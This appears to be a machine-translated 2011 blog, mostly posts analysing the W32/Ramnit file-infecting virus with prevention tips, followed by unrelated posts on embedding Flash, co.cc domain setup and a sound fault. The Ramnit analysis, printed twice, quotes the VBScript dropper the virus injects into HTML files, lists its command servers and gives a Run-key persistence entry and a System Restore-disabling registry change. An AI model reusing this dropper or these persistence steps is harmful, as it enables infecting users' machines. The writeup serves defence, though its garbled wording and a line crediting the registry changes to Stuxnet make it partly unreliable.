Wednesday, April 27, 2011

Malware Prevention Tips and Solution from W32/Ramnit

Posted by darmawan 7:57 PM, under ,,,, | No comments

  1. Turn on Windows Firewall or use other firewall software. This is to prevent the access of undesirable
  2. Make sure the computer is getting the latest updates from the Windows system. To simplify use automatic updates of the system such as "Automatic Updates". Or it could also download the latest patch from the Microsoft website. 
  3. Use antivirus software that are always updated with the good. This is to make it easier to variants of the new malware. 
  4. Restrict access to administrator access. For users of Windows 7 and Vista, make sure the UAC (user account control) has been going well.
  5.  Be cautious when opening e-mail attachment or when receiving the transfer of files from strangers. Always check to be scanned with the updated antivirus. 
  6. Be wary of programs crack / keygen or programs that are not known. Because it could have been infected with or contain malware. 
  7. Use a password that is not easy to read and known. Make sure always change the password at a particular time, and distinguish passwords with one another. 
  8. Turn off the "autoplay" Windows to prevent unwanted programs on a removable drive / disk runs automaticallyTurn off file sharing if not used. 
  9. If you do use file sharing only read-only status, or sharing configuration only for specific users.
  10. Be  careful when accessing a website or a forum that provides certain links to be downloaded or installed 
>>Caracteristic and definition Virus W32/Ramnit

File viruses W32/Ramnit

Posted by darmawan 7:49 PM, under ,,,, | No comments

Malware W32/Ramnit created using the C programming language is compressed using UPX. File malware has characteristics as follows:

     * Measuring 105 kb
     * Type the file "Application '
     * Using the icon "music folder"
     * Extension "exe"

W32/Ramnit When run, it will inject some Windows system files are:
C: \ WINDOWS \ system32 \ lsass.exe
C: \ WINDOWS \ system32 \ svchost.exe
C: \ WINDOWS \ system32 \ services.exe
C: \ Program Files \ Internet Explorer \ Iexplore.exe

If connected to the internet, W32/Ramnit will download some files and folders malware as follows:
C:\Documents and Settings\%user%\Local Settings\Temp\[angka].tmp
C:\Documents and Settings\%user%\Local Settings\Temp\explorer.dat
C:\Documents and Settings\%user%\Local Settings\Temp\winlogon.dat
C:\Documents and Settings\%user%\Local Settings\Temp\[nama_acak].exe
C:\Documents and Settings\%user%\Start Menu\Programs\[nama_acak].exe
C:\Program Files\Intenet Explorer\complete.dat
C:\Program Files\Intenet Explorer\dmlconf.dat
C:\Program Files\win\[angka_acak].exe
C:\Program Files\qwe
C:\WINDOWS\[nama_acak].exe
C:\WINDOWS\System32\[nama_acak].dll
C:\WINDOWS\System32\[nama&angka_acak].dll
C:\WINDOWS\Temp\[angka].tmp
In addition, W32/Ramnit perform following injection of multiple files (if any) are:
C:\contacts.html
C:\Inetpub\wwwroot\index.html
C:\Program Files\Common Files\designer\MSADDNDR.DLL
C:\Program Files\Common Files\designer\MSHTMPGD.DLL
C:\Program Files\Common Files\designer\MSHTMPGR.DLL
C:\Program Files\Common Files\System\ado\MDACReadme.htm
C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL
C:\Program Files\MSN\MSNCoreFiles\OOBE\obelog.dll
C:\Program Files\MSN\MSNCoreFiles\OOBE\obemetal.dll
C:\Program Files\MSN\MSNCoreFiles\OOBE\obepopc.dll
C:\Program Files\MSN\MSNIA\custdial.dll
C:\Program Files\MSN\MSNIA\msniasvc.exe
C:\Program Files\MSN\MSNIA\prestp.exe
C:\Program Files\MSN\MsnInstaller\iasvcstb.dll
C:\Program Files\MSN\MsnInstaller\msdbxi.dll
C:\Program Files\MSN\MsnInstaller\msninst.dll
C:\Program Files\MSN\MsnInstaller\msninst.exe
C:\Program Files\MSN\MsnInstaller\msnsign.dll
C:\Program Files\NetMeeting\netmeet.htm

Also on removable disks / drives will create several files:
autorun.inf
Copy of Shortcut to (1).lnk
Copy of Shortcut to (2).lnk
Copy of Shortcut to (3).lnk
Copy of Shortcut to (4).lnk
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak1].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak2].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak3].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak4].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak5].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak6].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak7].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak8].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak9].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak10].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak11].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak1].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak2].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak3].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak4].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak5].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak6].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak7].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak8].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak9].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak10].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak11].cpl
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak1].exe
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak2].exe
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak3].exe
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak4].exe
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak5].exe
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak6].exe
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak7].exe
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak1].cpl
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak2].cpl
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak3].cpl
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak4].cpl
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak5].cpl
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak6].cpl
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak7].cpl

And on networks that use mapping drives, trying to inject some files that have the following names:
  • Blank.htm
  • Citrus Punch.htm
  • Clear Day.htm
  • Fiesta.htm
  • Ivy.htm
  • Leaves.htm
  • Maize.htm
  • Nature.htm
  • Network Blitz.htm
  • Pie Charts.htm
  • Sunflower.htm
  • Sweets.htm
  • Technical.htm

Registry Modifications
Some registry modifications made ​​by the worm Stuxnet are as follows:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
[nama_acak] = C:\Documents and Settings\%user%\Local Settings\Temp\[nama_acak].exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60\0000\Control
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\featurecontrol
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\featurecontrol\FEATURE_BROWSER_EMULATION
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\international

Delete registry
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRes tore]
DisableSR = 0x00000001

Edit Registry
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
CurrentLevel =
1601 =

Symptoms & Effects W32/Ramnit

Posted by darmawan 7:35 PM, under ,,, | No comments

Some symptoms that occur if you are already infected are:
*  Pop-up ads or pop-ups to the content of pornography / gambling

       In some particular time, the browser will open a pop-up ads or pop-ups that contain pornographic content or gambling (casino). This sometimes makes the user's computer becomes uncomfortable. (see Image 2)
Image2, Pop-up ads that run W32/Ramnit
 
* Appears script error pop-ups or error after a pop-up ads that appear

After a pop-up ads that appear, will appear a pop-up error or script error from the browser. It appears this error script-like virus "ARP spoofing"in 2008. (see Figure 3)
Image3, Pop-up error or script error

* Infection of EXE and DLL files
Just as the variants of malware sality, Alman and Virut, W32/Ramnit make exe file infection. Only, W32/Ramnit also do infections on the DLL file (dynamic load library).
Exe and dll files in-infection increased by between 100-120 kb, depending on the variant that infects Ramnit. Nevertheless, not all exe and dll files in-infection.

 *  Injection HTML file
Besides infecting exe files and etc, W32/Ramnit also do injection of HTML files. Injection is done by adding the header and footer. (see image 4 and 5)
In the header, W32/Ramnit add the script:
DropFileName = "svchost.exe"
Image4, the script is added to the header of the HTML file

While in the footer, W32/Ramnit add the script:
Set FSO = CreateObject ("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & '\" DropFileName
If FSO.FileExists(DropPath)=False Then
Set fileobj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step2
Fileobj.write chr (CLng("&H" & Mid(WriteData, i,2)))
Next
Fileobj.close
End If
Set WSHshell = CreateObject ("Wscript.shell")
WSHshell.Run DropPath, 0

Image5, the script is added to the footer of the HTML file

 *  Creating Windows services function to be blank
With the action to inject the files on the file Iexplore.exe and services.exe file, and add a script to the web files (htm / html) making the function of the Windows services to be blank. (see figure 6)

Image6, the Windows Services function to be blank
 
* Creating computer hangs / slow and even network connections become disconnected.
Windows system files that would be targeted by injection W32/Ramnit namely:
-C: \ WINDOWS \ system32 \ svchost.exe (file system associated with the network connection, by injecting will make the network disconnected)
-C: \ WINDOWS \ system32 \ lsass.exe (file system-related computer activities, by injecting will make the computer hangs / slow).
-C: \ WINDOWS \ system32 \ services.exe (file system associated with the services and drivers that run)
-C: \ Program Files \ Internet Explorer \ Iexplore.exe (executable file from the internet explorer browser)
 
*Active in the process of memory
Malware W32/Ramnit try to connect to the Remote Server using Internet Explorer that have been on injection. This can be seen in the task manager, even though we are not open IE / Internet Explorer (see figure 7)
Image7, Process Iexplore.exe (Internet Explorer) that has been injected by W32/Ramnit
 
* Connect to Remote Server
Malware W32/Ramnit connect to the Remote Server to perform the necessary delivery information on the Remote Server. Remote Server is used that is between them:
195.2.252.247
195.2.252.252
69.50.193.157
74.125.227.17
74.125.227.18
74.125.227.20
95.211.127.69
 
 * Transferring data to a Remote Server
Besides trying to connect and to communicate with a remote server, W32/Ramnit also tried to transfer data from the victim's computer to the Remote Server and vice versa send malware files into the victim's computer. (see image 8)
Image8, the transfer of data between the victim's computer with Remote Servers

*  To broadcast
Just as it worms its Conficker, W32/Ramnit also do broadacast on the network. What was different was to W32/Ramnit only perform at one address, namely: ADX.ADNXS.COM (see image 9)
    Image9, conducted by Broadcast W32/Ramnit

Virus W32/Ramnit, exploit LNK vulnerability comparable to Sality

Posted by darmawan 6:33 PM, under ,,, | No comments

W32/Ramnit
Now with the ability to exploit LNK (Shortcut)

If Cristiano Ronaldo in URLs as Stuxnet, of course you ask what is likened to a virus as Messi? The answer is Ramnit. Although not explosive like Stuxnet, but with capabilities that are not inferior to the injection Stuxnet victim files, clear Ramnit infect many computers in Indonesia and slowly but surely cemented himself as one of the warlords who pelru virus alert computer users in Indonesia. Moreover, the latest variant Ramnit who now have the ability to exploit security holes LNK (Shortcut) so he was able to spread itself by creating shortcuts.

In the year 2010, which utilizes the dominance stuxnet vulnerabilities LNK (shortcut) is an intelligent work one step from the makers of malware. Not merely dominate, but also a trending topic malware in various articles and analysis worldwide.

At the moment the domination stuxnet still booming today, should we also need to be alert against new malware variants that attempted to show the existence of his hard work with the business of malware authors. Among the variants of malware that is worth the watch is detected as W32/Ramnit by Norman Security Suite (see Figure 1). Currently, variants of malware ramnit has spread rapidly around the world. Ramnit attacks come complete foreign domination of malware spread in Indonesia.
Image 1, Norman detect malware W32/Ramnit
 
Family malware W32/Ramnit

Ramnit Malware malware group is not really new, but has been actively spread also in 2010. Just because of malware such as user security hole LNK shortcut, sality, stuxnet, which makes this malware is not a concern of the analysis and computer users in the world.

Just like stuxnet, variant W32/Ramnit first appeared in mid-July and August 2010. While the second variant W32/Ramnit appear in October and November 2010, along with his scene-sality attack shortcut. And in mid-January 2011 is currently emerging is the third variant of W32/Ramnit family who tried to follow in the footsteps of its predecessors by using the security hole LNK (shortcut) to carry the infection and spread.

Characteristics W32/Ramnit

One of the things that make us need to be careful of that because this malware W32/Ramnit including groups that perform infectious virus files like Sality, Virut and Alman. This can be a scourge for computer users, because it will be difficult to clean the virus is doing the file infection, especially executable files (application).

W32/Ramnit is one of the variant viruses that make infection executable file (application). And not only executable files, but also do infections on the web file (HTML) files and DLL (dynamic load library).

Also, if you connect to the internet, ramnit will contact a remote server (IRC server) and connect to multiple addresses zombie servers to download a set of malware (viruses, trojans, spyware). At some particular time, W32/Ramnit using ads and popups to the content of pornography and gambling (casinos) and other commercial advertising that would make you uncomfortable when about browsing and surfing. Imagine if this happens when your child is under the age of the computer you're using protection with Parental Control. For parents this disaster because your child is exposed to pornography (because chances are that displayed pornographic content would escape the Parental Control which in pairs) and for children it might be considered "a blessing" for protection in the tide of pornography which turned out to be tricked.

By also exploit security holes LNK (shortcut), then the easier step to infect computer users quickly. Although not all three variants W32/Ramnit using the security hole LNK (shortcut), but almost all variants W32/Ramnit will be very difficult to clean.

Symptoms & Effects W32/Ramnit

Some symptoms that occur if you are already infected are:
*  Pop-up ads or pop-ups to the content of pornography / gambling

       In some particular time, the browser will open a pop-up ads or pop-ups that contain pornographic content or gambling (casino). This sometimes makes the user's computer becomes uncomfortable. (see Image 2)
Image2, Pop-up ads that run W32/Ramnit
 
* Appears script error pop-ups or error after a pop-up ads that appear

After a pop-up ads that appear, will appear a pop-up error or script error from the browser. It appears this error script-like virus "ARP spoofing"in 2008. (see Figure 3)
Image3, Pop-up error or script error

* Infection of EXE and DLL files
Just as the variants of malware sality, Alman and Virut, W32/Ramnit make exe file infection. Only, W32/Ramnit also do infections on the DLL file (dynamic load library).
Exe and dll files in-infection increased by between 100-120 kb, depending on the variant that infects Ramnit. Nevertheless, not all exe and dll files in-infection.

 *  Injection HTML file
Besides infecting exe files and etc, W32/Ramnit also do injection of HTML files. Injection is done by adding the header and footer. (see image 4 and 5)
In the header, W32/Ramnit add the script:
DropFileName = "svchost.exe"
Image4, the script is added to the header of the HTML file

While in the footer, W32/Ramnit add the script:
Set FSO = CreateObject ("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & '\" DropFileName
If FSO.FileExists(DropPath)=False Then
Set fileobj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step2
Fileobj.write chr (CLng("&H" & Mid(WriteData, i,2)))
Next
Fileobj.close
End If
Set WSHshell = CreateObject ("Wscript.shell")
WSHshell.Run DropPath, 0

Image5, the script is added to the footer of the HTML file

 *  Creating Windows services function to be blank
With the action to inject the files on the file Iexplore.exe and services.exe file, and add a script to the web files (htm / html) making the function of the Windows services to be blank. (see figure 6)

Image6, the Windows Services function to be blank
 
* Creating computer hangs / slow and even network connections become disconnected.
Windows system files that would be targeted by injection W32/Ramnit namely:
-C: \ WINDOWS \ system32 \ svchost.exe (file system associated with the network connection, by injecting will make the network disconnected)
-C: \ WINDOWS \ system32 \ lsass.exe (file system-related computer activities, by injecting will make the computer hangs / slow).
-C: \ WINDOWS \ system32 \ services.exe (file system associated with the services and drivers that run)
-C: \ Program Files \ Internet Explorer \ Iexplore.exe (executable file from the internet explorer browser)
 
*Active in the process of memory
Malware W32/Ramnit try to connect to the Remote Server using Internet Explorer that have been on injection. This can be seen in the task manager, even though we are not open IE / Internet Explorer (see figure 7)
Image7, Process Iexplore.exe (Internet Explorer) that has been injected by W32/Ramnit
 
* Connect to Remote Server
Malware W32/Ramnit connect to the Remote Server to perform the necessary delivery information on the Remote Server. Remote Server is used that is between them:
195.2.252.247
195.2.252.252
69.50.193.157
74.125.227.17
74.125.227.18
74.125.227.20
95.211.127.69
 
 * Transferring data to a Remote Server
Besides trying to connect and to communicate with a remote server, W32/Ramnit also tried to transfer data from the victim's computer to the Remote Server and vice versa send malware files into the victim's computer. (see image 8)
Image8, the transfer of data between the victim's computer with Remote Servers

*  To broadcast
Just as it worms its Conficker, W32/Ramnit also do broadacast on the network. What was different was to W32/Ramnit only perform at one address, namely: ADX.ADNXS.COM (see image 9)
    Image9, conducted by Broadcast W32/Ramnit

File viruses W32/Ramnit

Malware W32/Ramnit created using the C programming language is compressed using UPX. File malware has characteristics as follows:

     * Measuring 105 kb
     * Type the file "Application '
     * Using the icon "music folder"
     * Extension "exe"

W32/Ramnit When run, it will inject some Windows system files are:
C: \ WINDOWS \ system32 \ lsass.exe
C: \ WINDOWS \ system32 \ svchost.exe
C: \ WINDOWS \ system32 \ services.exe
C: \ Program Files \ Internet Explorer \ Iexplore.exe

If connected to the internet, W32/Ramnit will download some files and folders malware as follows:
C:\Documents and Settings\%user%\Local Settings\Temp\[angka].tmp
C:\Documents and Settings\%user%\Local Settings\Temp\explorer.dat
C:\Documents and Settings\%user%\Local Settings\Temp\winlogon.dat
C:\Documents and Settings\%user%\Local Settings\Temp\[nama_acak].exe
C:\Documents and Settings\%user%\Start Menu\Programs\[nama_acak].exe
C:\Program Files\Intenet Explorer\complete.dat
C:\Program Files\Intenet Explorer\dmlconf.dat
C:\Program Files\win\[angka_acak].exe
C:\Program Files\qwe
C:\WINDOWS\[nama_acak].exe
C:\WINDOWS\System32\[nama_acak].dll
C:\WINDOWS\System32\[nama&angka_acak].dll
C:\WINDOWS\Temp\[angka].tmp
 
In addition, W32/Ramnit perform following injection of multiple files (if any) are:
C:\contacts.html
C:\Inetpub\wwwroot\index.html
C:\Program Files\Common Files\designer\MSADDNDR.DLL
C:\Program Files\Common Files\designer\MSHTMPGD.DLL
C:\Program Files\Common Files\designer\MSHTMPGR.DLL
C:\Program Files\Common Files\System\ado\MDACReadme.htm
C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL
C:\Program Files\MSN\MSNCoreFiles\OOBE\obelog.dll
C:\Program Files\MSN\MSNCoreFiles\OOBE\obemetal.dll
C:\Program Files\MSN\MSNCoreFiles\OOBE\obepopc.dll
C:\Program Files\MSN\MSNIA\custdial.dll
C:\Program Files\MSN\MSNIA\msniasvc.exe
C:\Program Files\MSN\MSNIA\prestp.exe
C:\Program Files\MSN\MsnInstaller\iasvcstb.dll
C:\Program Files\MSN\MsnInstaller\msdbxi.dll
C:\Program Files\MSN\MsnInstaller\msninst.dll
C:\Program Files\MSN\MsnInstaller\msninst.exe
C:\Program Files\MSN\MsnInstaller\msnsign.dll
C:\Program Files\NetMeeting\netmeet.htm

Also on removable disks / drives will create several files:
autorun.inf
Copy of Shortcut to (1).lnk
Copy of Shortcut to (2).lnk
Copy of Shortcut to (3).lnk
Copy of Shortcut to (4).lnk
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak1].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak2].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak3].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak4].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak5].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak6].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak7].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak8].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak9].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak10].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak11].exe
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak1].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak2].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak3].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak4].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak5].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak6].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak7].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak8].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak9].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak10].cpl
RECYCLER/S-3-4-70-7603517533-1567780477-325265274-3130/[namaacak11].cpl
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak1].exe
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak2].exe
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak3].exe
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak4].exe
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak5].exe
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak6].exe
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak7].exe
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak1].cpl
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak2].cpl
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak3].cpl
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak4].cpl
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak5].cpl
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak6].cpl
RECYCLER/S-8-1-53-2203638008-1861115022-526586310-2180/[namaacak7].cpl

And on networks that use mapping drives, trying to inject some files that have the following names:
  • Blank.htm
  • Citrus Punch.htm
  • Clear Day.htm
  • Fiesta.htm
  • Ivy.htm
  • Leaves.htm
  • Maize.htm
  • Nature.htm
  • Network Blitz.htm
  • Pie Charts.htm
  • Sunflower.htm
  • Sweets.htm
  • Technical.htm

Registry Modifications
Some registry modifications made ​​by the worm Stuxnet are as follows:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
[nama_acak] = C:\Documents and Settings\%user%\Local Settings\Temp\[nama_acak].exe
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60\0000
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\Root\LEGACY_60DFFE60\0000\Control
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_60DFFE60\0000\Control
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\featurecontrol
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\Main\featurecontrol\FEATURE_BROWSER_EMULATION
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet Explorer\international

Delete registry
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRes tore]
DisableSR = 0x00000001

Edit Registry
[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
CurrentLevel =
1601 =

Distribution Method
Some ways W32/Ramnit make the distribution is as follows:
 
Drive by downloads (exploit)
W32/Ramnit initially spread by exploiting features of the drive by downloads in the Windows system. With the links that are spread on the forum or e-mail, trying to trick the user to run the link. In addition, when access to websites that provide content or browser plugins for download.
 
Removable drive / disk
This method is commonly done by computer users. W32/Ramnit make a lot of files to infect a computer, and were also exploit security holes LNK (shortcut). (see figure 10)

Image10, W32/Ramnit infected removable disk / drive

Network

W32/Ramnit try to do injections on a few web files (htm) specified in the network on a computer that make mapping drives. The following files are:
  • Blank.htm
  • Citrus Punch.htm
  • Clear Day.htm
  • Fiesta.htm
  • Ivy.htm
  • Leaves.htm
  • Maize.htm
  • Nature.htm
  • Network Blitz.htm
  • Pie Charts.htm
  • Sunflower.htm
  • Sweets.htm
  • Technical.htm

Malware Prevention Tips from W32/Ramnit
  1. Turn on Windows Firewall or use other firewall software. This is to prevent the access of undesirable
  2. Make sure the computer is getting the latest updates from the Windows system. To simplify use automatic updates of the system such as "Automatic Updates". Or it could also download the latest patch from the Microsoft website. 
  3. Use antivirus software that are always updated with the good. This is to make it easier to variants of the new malware. 
  4. Restrict access to administrator access. For users of Windows 7 and Vista, make sure the UAC (user account control) has been going well.
  5.  Be cautious when opening e-mail attachment or when receiving the transfer of files from strangers. Always check to be scanned with the updated antivirus. 
  6. Be wary of programs crack / keygen or programs that are not known. Because it could have been infected with or contain malware. 
  7. Use a password that is not easy to read and known. Make sure always change the password at a particular time, and distinguish passwords with one another. 
  8. Turn off the "autoplay" Windows to prevent unwanted programs on a removable drive / disk runs automaticallyTurn off file sharing if not used. 
  9. If you do use file sharing only read-only status, or sharing configuration only for specific users.
  10. Be  careful when accessing a website or a forum that provides certain links to be downloaded or installed

Thursday, April 21, 2011

How to Put Flash on Blog

Posted by darmawan 1:56 PM, under ,, | No comments

To install flash in your blog is easy enough. All you need is a flash file which is usually air-extension. swf and then upload the file to the hosting. eg at geocities.com ato ato 000webhost other hosting places. Flash animation files that can be used as decoration on the blog or can also be decorated in the header so that makes blogs more animatif. To install flash on the blog do the following:

1. Login to blogger then choose "Layout".
2. Then click on the link "Add a gadget" which will be placed flash animation.
3. Select "HTML / Javascript" then put the following script:

<embed src="http://blogoholic.info/wellcome.swf" quality="high" bgcolor="white" width="500" height="100" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/shockwave/download/index.cgi? P1_Prod_Version=ShockwaveFlash"></embed>

Setting a blog with your own domain name

Posted by darmawan 1:53 PM, under ,, | No comments

It is time to use their own domain name for our blog. as has been done by most people here is how.
You do not need to buy their own domain name because there which provide free domain. you can immediately list for free.

 Setting Domain di co.cc

As we already know, that co.cc is a top level domain name we can get it for free. We can change our blog name from "http://namadomain.blogspot.com" or "http" / / namadomain.wordpress.com "(etc.) into" http://namadomain.co.cc ". With co.cc we can control the DNS Records, A, MX, and CNAME records, so that the co.cc domain is not merely a "URL Forwarding".
Here I will try to reveal about the way in co.cc domain settings:

There are 3 types of settings at co.cc All three have its own function. penjelasanya following:

1. Managed DNS
This is usually used for a website that require web hosting and require that to drive him to the Name Server hosting. For example to create a web in 000webhost, or it could be to use a wordpress blog hosting distinguished from the outside. This method is not suitable for blogger / blogspot that uses the default hosting of blogger / blogspot.
The way the setting for this method is to fill in the "Name Server 1 and Name Server 2 with a distinguished name in accordance with the hosting server is used. For example, for those who use the hosting of 000webhost then to the column" Name Server 1 "condition with" ns01.000webhost . com "and column" Name Server 2 "condition with" ns02.000webhost.com ". Then click the " Setup ". Done

2. Zone Records
Zone records suitable for users of blogger / blogspot. here's how the settings for Zone Records

     * In the "Host" fill-me-km domain name register, eg "www.namadomain.co.cc" (do not forget to be given "www")
     * For option "TTL" leave it alone, do not need dirubah2
     * The option "Type"select the "CNAME"
     * For the column "Value" fill "ghs.google.com"

       So that would like to gamabr below:


 The next step is to change the settings in blogger / blogspot do this:
     * Login to blogger / blogspot then go to menu "Settings -> Publishing"
     * Then select "Switch to: • Custom Domain
     * Then click on "Already own a domain? Switch to advanced settings "
     * Then fill your new domain name on the "Your Domain".





 * Then click the "Save Settings"

Done. If successful (the setting is correct) then your new domain will activate within a few hours to 2 days. So wait patiently wrote. Blog you will still be accessible via the old domain.

3. URL Forwarding


URL forwarding can be used for any kind, can the web ato blog. But the URL Forwarding is only forward the new domain (which in co.cc) to the old domain. So the old domain will be 100% as before without any changes, only we can access our web / blog by typing the name of our new domain in the browser. If using URL Forwarding then indexed in google or another search engine that is still our old Domain.
To set the URL Forwarding is easy, we just fill in the requested data and adjusted to our web / blog, such as "Redirect to:, Page Title, URL Hiding, Meta Description and Meta Keywords. " We no longer need to set up the domain in the web / blog anymore.
Note: This method is not recommended if not forced


So the conclusion is:


     * If you use the service blogger / blogspot then use "Zone Records"
     * If the domain is used for web hosting or who need to wordpress then use "Manage DNS"
     * Do not use the "URL forwarding" if not forced. For example to multiply to the blog of which do not support custom domain.

Friday, April 15, 2011

Computer error no sound

Posted by darmawan 3:26 PM, under , | No comments

This is a problem that I experienced myself after reformatting the computer first. so, the story, after re-format the computer to do install the drivers .. but do not know why when install drivers from motherboard CD, every time install sound driver, always failed, writing "no sound card is detected" (just like that, I forget exactly how his writings)

